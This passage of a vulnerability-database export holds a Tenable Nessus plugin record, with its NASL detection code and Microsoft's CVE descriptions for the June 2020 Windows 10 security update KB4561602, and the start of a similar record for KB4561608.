vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1316)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)", "edition": 9, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-06-09T00:00:00", "title": "KB4561602: Windows 10 Version 1709 June 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1253", "CVE-2020-1073", "CVE-2020-1203", "CVE-2020-1207", "CVE-2020-1287", "CVE-2020-1237", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-0916", "CVE-2020-1235", "CVE-2020-1290", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1280", "CVE-2020-1211", "CVE-2020-1279", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1258", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1259", "CVE-2020-1257", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1199", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1255", "CVE-2020-1232", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1222", "CVE-2020-1241", "CVE-2020-1216", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1324", "CVE-2020-1312", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1233", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1162", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1293", "CVE-2020-1238", "CVE-2020-1286", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1309", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1201", "CVE-2020-1270", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1260", "CVE-2020-1217", "CVE-2020-1197", "CVE-2020-1283"], "modified": "2020-06-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561602.NASL", "href": "https://www.tenable.com/plugins/nessus/137255", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137255);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/14\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1073\",\n \"CVE-2020-1160\",\n \"CVE-2020-1162\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1199\",\n \"CVE-2020-1201\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1211\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1217\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1222\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1232\",\n \"CVE-2020-1233\",\n \"CVE-2020-1234\",\n \"CVE-2020-1235\",\n \"CVE-2020-1236\",\n \"CVE-2020-1237\",\n \"CVE-2020-1238\",\n \"CVE-2020-1239\",\n \"CVE-2020-1241\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1257\",\n \"CVE-2020-1258\",\n \"CVE-2020-1259\",\n \"CVE-2020-1260\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1266\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1278\",\n \"CVE-2020-1279\",\n \"CVE-2020-1280\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1283\",\n \"CVE-2020-1286\",\n \"CVE-2020-1287\",\n \"CVE-2020-1290\",\n \"CVE-2020-1291\",\n \"CVE-2020-1293\",\n \"CVE-2020-1294\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n \"CVE-2020-1305\",\n \"CVE-2020-1309\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1312\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1324\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561602\");\n script_xref(name:\"MSFT\", value:\"MS20-4561602\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0256-S\");\n\n script_name(english:\"KB4561602: Windows 10 Version 1709 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561602.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1282, CVE-2020-1304, CVE-2020-1334)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1238,\n CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Windows Feedback Hub improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1199)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302,\n CVE-2020-1312)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1280)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. (CVE-2020-1162,\n CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1316)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)\");\n # https://support.microsoft.com/en-us/help/4561602/windows-10-update-kb4561602\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?506489a5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4561602.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561602'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'16299',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561602])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T09:55:06", "description": "The remote Windows host is missing security update 4561608.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A vulnerability exists in the way the Windows\n Diagnostics & feedback settings app handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could cause additional diagnostic data\n from the affected device to be sent to Microsoft.\n (CVE-2020-1296)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1238,\n CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Mobile Device Management (MDM) Diagnostics\n improperly handles junctions. An attacker who\n successfully exploited this vulnerability could bypass\n access restrictions to delete files. (CVE-2020-1204)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. 